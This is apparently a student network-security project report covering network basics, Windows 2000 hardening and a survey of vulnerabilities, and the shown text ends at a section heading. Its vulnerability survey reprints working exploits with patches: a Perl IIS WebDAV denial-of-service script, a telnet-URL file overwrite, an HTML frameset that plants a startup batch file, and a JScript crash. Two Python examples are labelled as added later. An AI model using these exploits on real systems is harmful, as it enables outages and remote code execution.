
Faculty of Engineering and Architecture
Department of Electrical and Computer Engineering

Final Year Project report for the 05/06 academic year

Project name: DFNZ 06 Network Security

Project advisor: Dr. Ali Hajj

Team members:
Antoine George Akiki
Joseph Melhem Chaoul
Jean Kamal Moukarzel


List of Figures and Tables .... 4
Abstract .... 6
Introduction .... 8
1. A Brief Overview of Networks .... 10
  1.1 Network Symbols .... 10
  1.2 Network Components .... 11
  1.3 Network Structure .... 13
  1.4 OSI Model Overview .... 14
  1.5 Network Devices .... 16
    1.5.1 Hubs .... 16
    1.5.2 Switches/bridges .... 17
    1.5.3 Routers and layer 3 switches .... 18
2. Network Security Theory .... 19
  2.1 Physical Layer Security .... 19
  2.2 Hardware Layer Security .... 20
  2.3 Application Layer Security .... 21
  2.4 Operating System Layer Security .... 24
    2.4.1 Windows 2000 Vulnerabilities and Solutions .... 25
    2.4.2 Increasing Windows 2000 and XP security (refer to [7]) .... 29
  2.5 Network Layer Security .... 34
    2.5.1 TCP/IP – The Language of the Internet (refer to [12]) .... 35
    2.5.2 Attacks against IP (refer to [12]) .... 35
    2.5.3 IPSEC policy Architecture (refer to [13]) .... 38
  2.6 Internal Network Security .... 39
  2.7 Survey of Most Common Threats .... 41
    2.7.1 Attacks Automated by Malicious Codes .... 41
    2.7.2 Hackers Attacks (not automated by malicious codes) .... 48
    2.7.3 DoS .... 51
    2.7.4 Social Engineering .... 59
3. Our Network Design .... 63
  3.1 Topology .... 63
  3.2 Securing the Perimeter .... 64
  3.3 Our Network .... 68
4. Installing the Network .... 69
  4.1 Plugging the Network and Creating a Domain .... 70
    4.1.1 Setting Up the Linksys Product .... 70
    4.1.2 Creating the Domain .... 71
  4.2 Tightening Security .... 72
    4.2.1 Patches on Windows .... 72
    4.2.2 Disabling USB ports to Protect Against Flash Drives .... 72
  4.3 Creating Common and User Files .... 75
  4.4 Scanning the Network and Updating Security .... 75
    4.4.1 Linux Tools .... 76
    4.4.2 Windows Tools .... 76
  4.5 Confusing the Hackers: Honey Pots .... 77
    4.5.1 What is a Honeypot .... 77
    4.5.2 Classifications of Honeypots .... 78
    4.5.3 Review of most popular Honeypots .... 82
    4.5.4 Our selection and work .... 91
  4.6 User Logs .... 96
5. Countering the Attacks .... 106
  5.1 First Attack .... 106
  5.2 Second Attack: Physical Attack .... 116
Conclusion .... 118
Reference .... 120
Appendix .... 122
  Appendix A .... 122
  Appendix B: PortSentry .... 122
  Appendix C: Timeline and Budget .... 129


List of Figures and Tables

Figure 1.1: Networking facilitates the access of information (p11)
Figure 1.2: Hierarchical Structure of a Network (p12)
Figure 1.3: OSI layers (p14)
Figure 1.4: Workstations connected with a hub (p16)
Figure 1.5: Devices connected with a switch (p16)
Figure 1.6: Typical connections of a router (p17)
Figure 2.1: A Wider View of Internet-connected Networks (p36)
Figure 3.1: Our Network Design (p41)
Figure 2.1: Classification of malicious code (p43)
Figure 2.3: Main types of viruses (p44)
Figure 2.4: Program File Virus (p46)
Figure 2.5: Logic Bomb (p51)
Figure 2.6: DoS (p52)
Figure 2.7: DDoS Attack (p53)
Figure 2.8: DRDoS (p54)
Figure 2.9: DRDoS Reflection (p55)
Figure 2.10: TCP 3 way handshake (p57)
Figure 2.11: Smurf Attack (p57)
Figure 3.1: Network Topologies (p62)
Figure 3.2: Our Network Design (p67)
Figure 4.1: Back Officer Friendly Detective (p79)
Figure 4.2: BOF screen capture showing spoofed services (p82)
Figure 4.3: BOF warnings (p82)
Figure 4.4: Specter GUI (p85)
Figure 4.5: A possible deployment of Decoy Server (p87)
Figure 4.6: Honeynet Architecture (p89)
Figure 4.7: Server application output format (p101)
Table 1.1: Network Symbols (p10)


Abstract

Network security is a rising issue in all major businesses due to the increase in sophistication and abundance of security breaches over the past decade. This is why Deloitte & Touche, a major international auditing firm, proposed to AUB that a group of graduating computer engineers work on the network security issue as the topic for their Final Year Project. In this sense, preliminary meetings were arranged by Prof. Kayssi (ECE Department Chairperson), and held with Mr. Saad Majari, an AUB graduate now working for Deloitte's IT department, so that we could be introduced to the company and its interests concerning network security.

During these meetings, we agreed that two groups of three students each would work on the topic. The two groups' supervisor would be Prof. Ali el-Hajj, from the ECE department. It was also decided that our group would handle setting up a network and ensuring it is secured in all ways possible. The other group of three would therefore have the task of hacking into our network, from the outside but also from the inside, in order to pinpoint our network's weaknesses. The output of this project would be proper documentation relating all the steps taken to secure the network and to deal with the attacks.

During the first stage of our Final Year Project, we performed an in-depth literature survey in order to get more acquainted with the subject. Reading material was provided to us by Mr. Awad, Mr. Majari and Mr. Brouwer, from Deloitte, in addition to white papers and documents we found on the internet.

The material found relevant to our project is included in this report. Covered topics range from network specification and topology and an overview of past and current security breaches to security strategies for the different network layers, possible attacks, etc.

With this in-depth information, we were able to set up our network in the second stage of our FYP, and secure it by implementing the security strategies. We were given four computers equipped with Pentium 2 processors. We thus installed one Windows 2000 server, one Windows 2000 workstation, one Fedora server and one Fedora workstation.

Finally, the third and final stage of our FYP was the "attacks" stage. The hackers' team attempted to attack our network externally and internally. Full documentation is included in this report.


Introduction

Our Final Year Project (FYP), entitled 'Dfnz06', is a project involving network security and attacks. Throughout the academic year, two teams will challenge each other, one being the security team (our team) and one being the hacking team. The project was proposed and will be supervised by Deloitte, in cooperation with Prof. Ali Hajj from the ECE department.

Security of networks and information systems in general is essential to businesses that need to connect to the internet and keep their data safe. It is also essential within the business, when employees are given specific roles and privileges, which define what part of the information they can read and/or write.

In this sense, it is important for a business to build a well-secured network. In doing so, many factors are to be taken into consideration, as we are tackling a multi-disciplinary field, which nonetheless must be treated as a whole [1].

The task assigned to us was to build a small network, just as small and medium size businesses (SMB) would do, and document all the guidelines and steps that were followed to secure this network. In this way, the resulting document could be used as a reference for students, faculty, but also professionals wanting to learn about the measures that should be taken in order to have a protected network.

However, it does not stop here. It is common practice amongst engineers to test every design they make. In the case of our FYP, the testing will be a real-life situation. Another group of students will try to hack into our network, from the outside (by connecting to our firewall), and from the inside (they will be given an account with limited privileges and will try to bypass it). In this way, not only the steps in designing the network will be documented, but also the measures to be taken when a breach of security is identified.

This report gives an account of what has been done in our FYP during the whole 2005/2006 academic year.

It starts by giving a brief overview of networks, as it is essential to fully understand the way a network operates in order to secure it. It then presents what can be regarded as a literature survey: a summary of all the information relevant to network security design that we will be using while building the network. As was stated earlier, many factors should be taken into consideration, such as the physical layer, the hardware layer, the application layer, the operating system layer and the network layer. It is also important to know the enemy when trying to defend a network: therefore, a survey of the most common threats and how they should be dealt with is presented in this report. Moreover, this report presents our design: the network we built and its specifications (documenting the steps taken while building). Finally, the last part of this report is a detailed documentation of the attacks performed by the hackers' team and the ways by which we dealt with such attacks.


1. A Brief Overview of Networks

This section presents a review of internetworking terminology, such as the Open System Interconnection (OSI) reference model and how the layers in the OSI model operate. Moreover, this section gives a brief overview of the devices that are used to support different network requirements.

1.1 Network Symbols

The following symbols will be used throughout this report to illustrate various network devices. All graphics are courtesy of Cisco Systems.


Table 1.1: Network Symbols. Symbols defined: Router, Firewall, Switch, Workstation, Bridge, Server, Hub.

1.2 Network Components

The primary purpose of networks is to enable easy access to information regardless of place, time, and type of computer system [2].


Figure 1.1: Networking facilitates the access of information [2]

As can be seen in the figure above, the big company network is subdivided into the following network components:

• The Main Office: everyone in this office is connected via a LAN (Local Area Network). The company's servers (and hence vital information) are located on and connected via this same LAN.

• A Branch Office: information from the main office's server can be accessed remotely (via a multitude of ways: leased line, Virtual Private Network, Internet…). In this way, although physically far, the branch office seems part of the main office's network.

• A Home Office: employees can work from their homes, most likely with on-demand connections to the main office (or even the branch office). In this way, an employee working from home can access information from the company's servers and use the network's resources.

• Mobile Users: these are individuals who connect to the main office's LAN wherever they are (by a multitude of means, most likely an on-demand connection using phone lines).

The fact that the main office's LAN is connected to the internet and to other network components (like the branch office) makes it important to have a secure design. In this way, vital information will not fall into the wrong hands and the company's privacy will be preserved.

1.3 Network Structure

In general, and in almost every enterprise, networks are structured in a hierarchical way:

Figure 1.2: Hierarchical Structure of a Network (layers shown, top to bottom: Access Layer, Distribution Layer, Core Layer)

The access layer of the network, also referred to as the desktop layer, is the point at which end users are connected to the LAN. In other words, the access layer is any end-station's entry point to the network. Sometimes, end users are placed in groups according to which resources they need to access the most. Most of the time, when a user needs to use the printer, access a server or use the internet, his traffic is directed to the distribution layer.

The distribution layer, also referred to as the workgroup layer, is the link between the access layer (hence the users) and the "motorway" [2] of the network, i.e. the core. The main function of the distribution layer is to perform vital packet manipulation such as:

• Routing,

• Filtering,

• WAN access…

In brief, the distribution layer can be regarded as the policy controller: it determines if and how packets can access the core. It also determines the fastest way for a user to access the servers. In any case, once the layer in question decides on the path, it forwards the request to the core layer.

The main purpose of the core layer, also referred to as the backbone, is to switch traffic as fast as possible. It also provides quick transport to what are called enterprise services: e-mail, videoconferencing and, most importantly, Internet.

1.4 OSI Model Overview

The OSI model is the conceptual framework of how networks are built and operate. As the figure below illustrates, the OSI model has seven layers:

Figure 1.3: OSI layers [2]

The four lower layers define ways for end stations to connect to each other in order to exchange data. The three upper layers define the way applications (within the end stations) communicate with each other and with the users. In more detail, the roles of each layer are:

• Application layer: the layer at which the user interacts with the computer. Protocols at this layer determine available resources, define communication partners and synchronize all communication.

• Presentation layer: ensures that information sent by the application layer of one end station will be readable by the application layer of another end station operating on another system. This is done by encryption, for example.

• Session layer: establishes, manages and terminates communication sessions between presentation layers.

• Transport layer: this layer distinguishes between upper layer applications, and establishes end-to-end connectivity between them. It also defines flow control and provides reliable or unreliable services for data transfers.

• Network layer: this layer defines the logical source and destination addresses associated with a specific protocol. It also defines the different paths that exist through the network and interconnects multiple data links. Note that routers and layer 3 switches operate at this layer.

• Data-Link layer: this layer defines the physical source and destination addresses and the network topology. It also supports frame sequencing and flow control. Note that switches operate at this layer.

• Physical layer: this layer is the most basic of all; it defines the media type, connector type and signaling type. In other words, this layer specifies the electrical, mechanical, procedural and functional requirements for activating, de-activating and maintaining the physical link between end systems. Note that hubs and bridges operate at this layer.

1.5 Network Devices

1.5.1 Hubs

Hubs operate at the physical layer. This implies that all devices are in the same broadcast domain and the same collision domain. The devices also share bandwidth. In other words, devices connected to a hub communicate with each other as if they were on the same segment. The hub connecting them does not manipulate or view the traffic exchanged.


Figure 1.4: Workstations connected with a hub

1.5.2 Switches/bridges

Layer 2 switches (i.e. switches) or bridges operate at the data-link layer. Each segment connected to a port in the switch has its own collision domain, but all segments are in the same broadcast domain.

The switch hears every frame that crosses a segment and determines whether it has to copy it to another segment by looking at the destination address and checking its MAC table.

Figure 1.5: Devices connected with a switch
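As an added illustration of the hub/switch difference described in 1.5.1 and 1.5.2 (example code written for this edit, not part of the report), the simulation below replays a few constructed frames through a hub and through a learning switch and records which station's interface receives which frame:

```python
"""Hub vs. learning-switch forwarding, as described in 1.5.1 and 1.5.2.
Added example, not code from the report; stations, MAC addresses and
frames are constructed for the demonstration."""
from dataclasses import dataclass

BROADCAST = "ff:ff:ff:ff:ff:ff"


@dataclass(frozen=True)
class Frame:
    src: str      # source MAC address
    dst: str      # destination MAC address (BROADCAST for a broadcast frame)
    payload: str


class Hub:
    """Physical-layer repeater: one collision domain, every frame is repeated
    out of every port except the one it arrived on."""

    def __init__(self, port_count):
        self.port_count = port_count

    def forward(self, in_port, frame):
        return [p for p in range(self.port_count) if p != in_port]


class Switch:
    """Data-link device: learns source MAC -> port from every frame it hears,
    forwards a unicast frame only to the learned port, and floods frames whose
    destination is unknown or broadcast (all ports stay in one broadcast domain)."""

    def __init__(self, port_count):
        self.port_count = port_count
        self.mac_table = {}

    def forward(self, in_port, frame):
        self.mac_table[frame.src] = in_port          # learning step
        out_port = self.mac_table.get(frame.dst)
        if frame.dst != BROADCAST and out_port is not None:
            # Known unicast: copy only to the segment that owns the address
            # (nothing to copy if source and destination share a port).
            return [] if out_port == in_port else [out_port]
        return [p for p in range(self.port_count) if p != in_port]  # flood


def observed_traffic(device, stations, frames):
    """Replay frames through the device. stations maps port -> station MAC.
    Returns {mac: [payloads]} delivered to each station's interface; a station
    running a sniffer in promiscuous mode sees exactly this list."""
    port_of = {mac: port for port, mac in stations.items()}
    seen = {mac: [] for mac in stations.values()}
    for frame in frames:
        for port in device.forward(port_of[frame.src], frame):
            seen[stations[port]].append(frame.payload)
    return seen


# Constructed scenario: three workstations A, B and C on ports 0, 1 and 2.
STATIONS = {0: "aa:aa:aa:aa:aa:01", 1: "bb:bb:bb:bb:bb:02", 2: "cc:cc:cc:cc:cc:03"}
A, B, C = STATIONS[0], STATIONS[1], STATIONS[2]
FRAMES = [
    Frame(A, B, "A->B hello"),        # B not yet learned: the switch must flood
    Frame(B, A, "B->A reply"),        # A already learned: only port 0 gets it
    Frame(A, B, "A->B secret"),       # both learned: C no longer sees it
    Frame(A, BROADCAST, "A->* arp"),  # broadcast reaches every port on both devices
]


def compare_devices():
    """Return (hub_view, switch_view) for the constructed scenario."""
    hub_view = observed_traffic(Hub(3), STATIONS, FRAMES)
    switch_view = observed_traffic(Switch(3), STATIONS, FRAMES)
    return hub_view, switch_view


if __name__ == "__main__":
    for name, view in zip(("hub", "switch"), compare_devices()):
        print(name)
        for mac, payloads in view.items():
            print(f"  {mac} receives {payloads}")
```

On the hub, station C receives the whole A-B conversation; on the switch it receives only the initial flood and the broadcast, which is why a hub-based segment exposes every conversation to any sniffing station while a switch limits that exposure to broadcasts and unlearned destinations.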


1.5.3 Routers and layer 3 switches

Routers and layer 3 switches operate at the network layer. They can control broadcasts and multicasts, they determine the optimal path a frame should take, and they manage traffic. Usually, routers are the network's doorway to the internet or to a bigger WAN.

Figure 1.6: Typical connections of a router (to the Internet and to other LANs)


2. Network Security Theory

Now that we have a brief, but precise and clear understanding of how a network operates, it is time to tackle the security aspect. How is a network secured from the outside and from within? What are the different fields that come into play? All those questions were answered by our research. Although we have come across a lot of readings, we hereby present the information we judged to be the most essential and relevant to our project.

Security is multi-dimensional: it spans different layers. Throughout this section we will discuss the security of the physical, hardware, application, operating system and network layers. Moreover, this section will give the principal rules and guidelines to secure a network from the inside.

2.1 Physical Layer Security

Physical security is often viewed as the first line of defense of a system [1]. It prevents the intruder from accessing the system physically (sitting down and accessing information on an already logged-in computer).

Applying physical layer security to our FYP gives us the following guidelines:

• A person of our team should always be present whenever a computer is logged in. Logged-in computers should never be left unattended.

• If possible, access to the room where our network is located (Khaled JouJou's lab) should be controlled and banned to those who do not have business there. Moreover, the switch and firewall should not be accessible to members outside the team. If this is not possible, users should be restricted to log in only on certain systems, whether they be identified by MAC addresses (see further sections) or a hostname. Security can also be enhanced by allowing them access only during certain times, for example.

• The team should adopt a clear desk policy: vital documents should be stored on CDs or USB keys, and should not be left unattended (lock in drawers, take home…).

• A proper inventory of all the equipment we have should be made, and no device or machine should be unplugged and taken away without a reason.

• Our network should be protected against power failures and climate hazards (this should not be a problem in Mr. Joujou's labs).

On a larger enterprise scale, other measures can be taken to increase the physical security of the system: biometrics can be used for ID purposes, visitors should not be left unattended, server rooms should be equipped with appropriate monitoring devices (cameras for example), guarded by appropriately trained personnel, or secured with key-card access doors.

2.2 Hardware Layer Security

There are two aspects of hardware security: the first one consists of security at the hardware level in CPUs, and the second one consists of hardware security at the level of the enterprise and the users [1]. An example of a security issue at the CPU level is interrupt handling. The interrupt vector table is a target for hackers that are able to exploit system vulnerabilities at the lower level.

As for hardware security at the level of the enterprise, the following guidelines should be implemented in our FYP:

• Access to a server's or a workstation's BIOS should be protected by a password (which only the administrator knows). In this way, a user will not be able to take control of the machine or to access data that he would otherwise not be able to retrieve (given his privileges).

• Appropriate BIOS configuration should be done to limit the drive boot sequence to the OS drive. A user should not be able to boot from other drives such as floppies or CDs. Also, by forcing the workstation to boot only from the OS drive, installation of software or new operating systems will be denied.

• Configurations of routers and/or switches should be password protected.

On a larger enterprise scale, it is also important to protect access to printers with a password. Otherwise, a hacker can change a printer's configuration and reroute printer outputs to other destinations (theft of information).

2.3 Application Layer Security

Application layer security is very important since it involves the entry of data [1]. The application layer consists mainly of software and database development. The threats at this layer are: buffer overflows, backdoors, incompleteness of data and viruses. There are specific guidelines we will be following to achieve security at this layer.

• Users should be limited to having only one active session with the applications and the network. In this way, accountability of users is enhanced.

• Users should have identifiable usernames that follow the same pattern for all (ex: the AUB usernames are composed of the users' initials). Logs should be entered in a database, and queries can be used to retrieve specific information.


• A list of unauthorized software should be established, to prevent users from installing any undesired, dangerous software (it is recommended to ban users from installing any software).

• Highly sensitive data should be encrypted before being stored. In this way, reading or writing such data is more difficult.

• Any software upgrade should be installed in time. However, it is recommended to test these upgrades and look for any patches that could enhance security.

• Initial passwords should be generated randomly and then given to users.

• Some password conditions should be set: passwords should not be the same as the usernames, or the user's department for example. They should be at least 6 (or 8 in sensitive cases) characters long, and include combinations of letters and numbers. In this way, guessing a password is almost impossible and cracking one is a lengthy process for hackers.

• If a user tries to access his account with no result (the password entered is incorrect), his account should be blocked after 3 trials. Only the administrator should have the power to unblock the account.

• When the administrator changes the privileges of a user (after a promotion or a demotion for example), the user should automatically be logged off and asked to log in again. Moreover, if a user account is deleted, the user should also be logged off (to prevent this user from doing unnecessary and dangerous operations when in fact he is not allowed to). In this way, user accountability and responsibility are enforced.


• The user profile should be complete and informative. In a company for example,

it should include the department of the user, his ranking, etc. To force the user to

fill in vital information in his profile, some fields should be made obligatory. In

this way, if ever the user’s information is needed, it will be complete and clear

and accountability is thus enforced.
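As an added illustration of the account rules above (this is not the report's own code): a policy check, a random initial-password generator and a lockout counter in Python. The usernames, departments and the in-memory account store are constructed; the three-trial block and the 6/8-character minimums are the figures from the list.

```python
import hashlib
import hmac
import secrets
import string

MAX_FAILED_ATTEMPTS = 3          # "blocked after 3 trials"
ALPHABET = string.ascii_letters + string.digits


def password_policy_errors(password, username, department, sensitive=False):
    """Return the list of rules the password breaks; an empty list means it is acceptable."""
    errors = []
    min_len = 8 if sensitive else 6                   # 6 normally, 8 in sensitive cases
    if password.lower() == username.lower():
        errors.append("password equals username")
    if password.lower() == department.lower():
        errors.append("password equals department")
    if len(password) < min_len:
        errors.append("shorter than %d characters" % min_len)
    if not (any(c.isalpha() for c in password) and any(c.isdigit() for c in password)):
        errors.append("must mix letters and digits")
    return errors


def generate_initial_password(length=8):
    """Randomly generated initial password (letters and digits) that satisfies the policy."""
    while True:
        pw = "".join(secrets.choice(ALPHABET) for _ in range(length))
        if any(c.isalpha() for c in pw) and any(c.isdigit() for c in pw):
            return pw


class Account:
    """Constructed in-memory account record: salted hash, failure counter, block flag, session."""

    def __init__(self, username, department, password, role="user", sensitive=False):
        errs = password_policy_errors(password, username, department, sensitive)
        if errs:
            raise ValueError("; ".join(errs))
        self.username, self.role = username, role
        self.salt = secrets.token_bytes(16)
        self.digest = self._hash(password)
        self.failed, self.blocked, self.logged_in = 0, False, False

    def _hash(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode(), self.salt, 100_000)

    def login(self, password):
        """True on success; the third wrong password in a row blocks the account."""
        if self.blocked:
            return False
        if hmac.compare_digest(self._hash(password), self.digest):
            self.failed, self.logged_in = 0, True
            return True
        self.failed += 1
        if self.failed >= MAX_FAILED_ATTEMPTS:
            self.blocked = True
        return False

    def admin_unblock(self):
        """Only the administrator may call this; it also resets the failure counter."""
        self.blocked, self.failed = False, 0

    def change_privileges(self, new_role):
        """Promotion or demotion: the user is logged off and must log in again."""
        self.role = new_role
        self.logged_in = False
```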

The biggest threat resulting from many applications is their vulnerability to "buffer overflow" attacks, which usually result in the hacker gaining access to the system with the rights of whatever user account the application was running under.

The following are some general guidelines related to applications:

• More secure equivalents of insecure applications should be used (e.g. ssh instead of telnet, since telnet is inherently insecure due to the fact that passwords are transmitted over the wire as clear text).

• Applications should be kept up to date with the latest versions. Many releases are specifically developed to address security issues.

• The ports that an application opens up should be determined and closed if they are not absolutely necessary.

• The application vendor's Web site should regularly be checked for information on how to make the application more secure and for any news items or patches that address newly discovered security vulnerabilities.

• In the case of a Web server, proper programming techniques can ensure that CGI scripts are secure.

• Also in the case of a Web server, if Web page updates are fairly infrequent, a floppy disk may be used to "sneaker-net" the updated HTML files: log into the console as root, mount the floppy disk, copy the files into the DocumentRoot directory, and then unmount the floppy. Doing so eliminates the need to run an ftp server service and to enable an account for the person who maintains the pages.

2.4 Operating System Layer Security

As will be seen in the next section of this report, the computers we were provided with have Pentium II processors. We therefore decided to install Windows 2000 on them, since Windows XP would be too slow, as well as Fedora. This section aims to present the vulnerabilities and protection schemes for the Windows 2000 operating system and Linux.

Hardening the operating system involves many things that are not only operating-system-specific, but may often vary from one "flavor" of an operating system to another. Typical steps, whatever the OS, include:

• Disabling all default accounts and groups that are not needed. When an operating system is installed it sets up quite a few user accounts and groups by default (like the guest account, or other application accounts).

• Changing the startup configuration so that only necessary services are running. Many services open TCP/IP "ports" which hackers find when running port scans against systems. Thus, closing all unnecessary ports by disabling unnecessary services or applications is a common practice.

• Logging off server consoles that are not being used. This is of particular importance for Internet-connected systems.

2.4.1 Windows 2000 Vulnerabilities and Solutions

Microsoft IIS 5.0 WebDAV 'Search' Denial of Service is a vulnerability that was published on March 16, 2001. WebDAV contains a flaw in the handling of unusually long requests: submitting a valid yet unusually long WebDAV 'search' request could restart the IIS services and possibly cause the server to stop responding. The following exploit has been provided by Georgi Guninski [4]:

    #!/usr/bin/perl
    use IO::Socket;
    printf "IIS 5.0 SEARCH\n wait some time\n";
    if(@ARGV < 2) { die "\nUsage: IIS5 host port \n"; }
    $port = @ARGV[1];
    $host = @ARGV[0];
    sub vv() {
      $ll=$_[0]; #length of buffer
      $ch=$_[1];
      $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
      $over=$ch x $ll; #string to overflow
      $xml='<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("'.$over.'")</D:sql></D:searchrequest>'."\n";
      $l=length($xml);
      $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
      syswrite($socket,$req,length($req));
      print ".";
      $socket->read($res,3000);
      print "r=".$res;
      close $socket;
    }
    do vv(126000,"V");
    sleep(1);
    do vv(126000,"V"); #Try 125000 - 128000

Solution:

Microsoft patch Q291845_W2K_SP2_x86_en
http://download.microsoft.com/download/win2000platform/Patch/q291845/NT5/EN-US/Q291845_W2K_SP2_x86_en.EXE

Microsoft IE 5.01/5.5 Telnet Client File Overwrite is a vulnerability that was published on March 09, 2001. Services for Unix 2.0 contains a client-side logging option which records all information exchanged in a telnet session. A vulnerability exists that could enable a remote user to invoke the telnet client and execute arbitrary commands on a target machine via IE. This is achieved by crafting a URL composed of command line parameters to the telnet client, which would invoke 'telnet.exe'. Telnet would connect to the host and initiate the logging of session information; access to this file will allow an attacker to write arbitrary commands which may be executed later.

The following exploit has been provided by Oliver Friedrichs [4]:

    telnet:-f%20\file.txt%20host

The following is an example of a malicious HTML message which could cause data that is received from the destination port on the host "host" to be written to the file "filename" in the startup directory for all users. If the logged-in user has the appropriate permissions, a batch file will be created and executed upon future authentication.

    <html>
    <frameset rows="100%,*">
    <frame src=about:blank>
    <frame src=telnet:-f%20\Documents%20and%20Settings\All%20Users\start%20menu\programs\startup\start.bat%20host%208000>
    </frameset>
    </html>

Solution

Microsoft has released a patch which rectifies this issue:
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp

Microsoft Outlook vCard Buffer Overflow is a vulnerability that was published on February 22, 2001. Due to an unchecked buffer in Microsoft Outlook, it is possible for a remote user to execute arbitrary code on a victim's machine. If a maliciously crafted .vcf file containing malformed data in the 'Birthday' field is sent as an attachment and executed, the maliciously embedded code could be run on the recipient's machine. An exploit has been provided by Ollie Whitehouse [5]. A solution is also provided by a Windows patch:
http://www.microsoft.com/windows/ie/download/critical/q283908/default.asp

Windows 2000 EFS Temporary File Retrieval Vulnerability was published on January 19, 2001. EFS is the Encrypting File System package designed to secure sensitive information. It is included with the Windows 2000 operating system, distributed and maintained by Microsoft Corporation. A problem in the package could allow the recovery of sensitive data encrypted by EFS. When a file is selected for encryption, a backup copy of the file is moved into the temporary directory using the file name efs0.tmp. The data from this file is taken and encrypted using EFS, with the backup file being deleted after the encryption process is performed. However, after the file is encrypted and the backup is deleted, the blocks in the file system are never cleared, thus making it possible for any user on the local host to access the data of the encrypted file, which falls outside of the constraints of access control imposed by the operating system. This makes it possible for a malicious user to recover sensitive data encrypted by EFS.

Microsoft WINS Domain Controller Spoofing Vulnerability was published on January 17, 2001. Windows Internet Naming Service (WINS) ships with Microsoft Windows NT Server. WINS resolves network computer names to IP addresses in a client-server environment. A distributed database is updated with an IP address for every machine available on the network. Unfortunately WINS does not properly verify the registration of domain controllers. It is possible for a user to modify the entries for a domain controller, causing the WINS service to redirect requests for the DC to another system. This can lead to a loss of network functionality for the domain. The DC impersonator can also be set up to capture username and password hashes passed to it during login attempts. An exploit has been provided by David Byrne [6], and a workaround by Paul Schmehl [4].

Microsoft MSHTML.DLL Crash Vulnerability was published on January 15, 2001. MSHTML.DLL is the shared library for parsing HTML in Internet Explorer and related applications. It may be possible for an attacker to crash this library remotely and cause a denial of service with special JScript code. This bug involves JScript's ability to handle multiple window objects. If a window object is deleted after it receives data and then re-initialized, the library will reportedly crash. This behavior has been attributed to a stack overflow by its discoverer. It is reportedly not exploitable in any way that may permit an attacker to gain access to the victim host. The following exploit has been provided by Thor Larholm:

    <iframe id=test style="display:none"></iframe>
    <script>
    Larholm = {}; // Object literal
    test.document.open(); // Stream data
    test.document.write("<s"+"cript>top.Larholm.test=0</s"+"cript>");
    delete Larholm;
    Larholm = {}; // Crash
    </script>

2.4.2 Increasing Windows 2000 and XP Security (refer to [7])

Editing the registry and disabling services can lead to problems. We must back up before we change any setting, and change only one setting at a time.

- Registry settings are edited with a program called regedt32. Click on the Start Menu > Run > type regedt32.

- Services are turned on and off with services.msc. Click on the Start Menu > Run > type services.msc.

Null sessions allow unwanted users to gain access to our computers; they are opened on NetBIOS ports 139 and 445. NetBIOS is Windows' default protocol for "File and Print Sharing." With automated tools, hackers will gain access to crucial system information such as accounts and passwords. NULL sessions are a built-in communication share using an anonymous user and a NULL password on the NetBIOS port. The easiest way to stop NULL sessions is by disabling "File and Print Sharing" on all network devices. In order to do so on Windows 2000, go to Control Panel > Network and Dial-up Connections and select the proper connection.

If these services are required, then we will make a registry entry to protect against sending sensitive data through the NetBIOS port:

- Open regedt32 from the Run menu.

- Select HKEY_LOCAL_MACHINE > System > CurrentControlSet > Control > LSA.

- The key we want to edit is RestrictAnonymous.

- Change the value to 1 or 2. A setting of 1 indicates that null connections are allowed but sensitive data is blocked from being sent via the connection (the only option available in NT4). A setting of 2 will disallow any NULL connections; this may conflict with some third-party software. There are a few hacking tools that will work on a level 1 setting and retrieve information. Reboot the machine when done.

Another way to prevent access to port 139 is to disable NetBIOS over TCP/IP. Windows will then fall back to port 445 to respond to NULL sessions and other requests.

Disable SNMP services

If null sessions are disabled, another easy way to gain system information is through public SNMP. SNMP permits the monitoring and managing of a network from a single workstation or several workstations, called SNMP managers. It is a family of specifications that provides a means for collecting network management data from the devices residing in a network. With an SNMP manager, you can query the network's devices regarding the nature of their functions.

If there are no programs using SNMP, we can disable this service. This is the easiest way to protect against hacks and free up some memory.

If SNMP access is needed, then we set SNMP not to run in public mode:

- Open the registry editor.

- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters > ValidCommunities.

- Select Security > Permissions and change them to permit access only to approved users.

There is one more step to disabling public access to SNMP:

- Go to HKLM > System > CurrentControlSet > Services > SNMP > Parameters > ExtensionAgents and delete the value that contains the LANManagerMIB2Agent. Then rename the other entries to update the sequence, i.e. 2, 3, etc., until the sequence begins with 1.

Disable unused services, since they take up space and allow hackers to attack through the ports they leave open. We should disable the Messenger service if it is not used, since it gives the hacker system rights.

Local Security Policy Tips: To edit Windows 2000 or XP's Local Security Policy follow the following path:

- Start > Administrative Tools > Local Security Policy. The Local Security editor has the same feel as the registry editor.

- Always set a password for the Administrator account.

- Set the password to 6 or more characters: Account Policies > Password Policy > Minimum Password Length.

- Ensure passwords use a combination of letters and numbers. To enable this setting, enable Account Policies > Password Policy > Password Must Meet Complexity Requirements.

- Enable account lockout: Account Lockout Duration and Account Lockout Threshold.

- Require users to change their passwords.

Account Tips: The more accounts on a computer, the more entry points attackers can try. Default accounts will always get us into trouble because the attacker does not have to guess a user name. We must always disable the guest account if it is not needed. There are tools that will allow an attacker to create accounts with Administrative privileges on an unpatched Windows 2000 system. We must not log in as administrator if we do not need to. Viruses or malicious scripts will try to run programs or modify registry settings. If the user does not have access to perform these tasks, then the malicious script cannot either.

Terminal Services: 128-bit encryption must be used to defeat packet sniffers. Change Terminal Services to log users off. If a session is left open, a hacker might enter that person's session. Another safety measure with Terminal Services is to change the port from the default port of 3389. If you want to learn how to perform this edit, refer to Appendix A. This method will not really stop attacks; it just avoids attackers doing a quick scan or targeting port 3389.

Disable DNS Transfers: If using Active Directory, limit DNS zone transfers. Otherwise attackers are able to scan the network and gain information on IP addresses and ports. While there is no damage to our system by performing these scans, attackers can learn a lot about our network. To disable them go to:

- Start > Programs > Administrative Tools > Computer Management > Services and Applications > DNS > [server] > Forward Lookup Zones > [zone_name] > Properties.

- Add the IP addresses that are on your network. The best option is to disable zone transfers by unchecking Allow Zone Transfers.

Port Scanners are very useful tools for finding ports open on our system or network. Here are a couple we might try: SuperScan, NetScanTools Pro, GFI, and NMap.

2.5 Network Layer Security

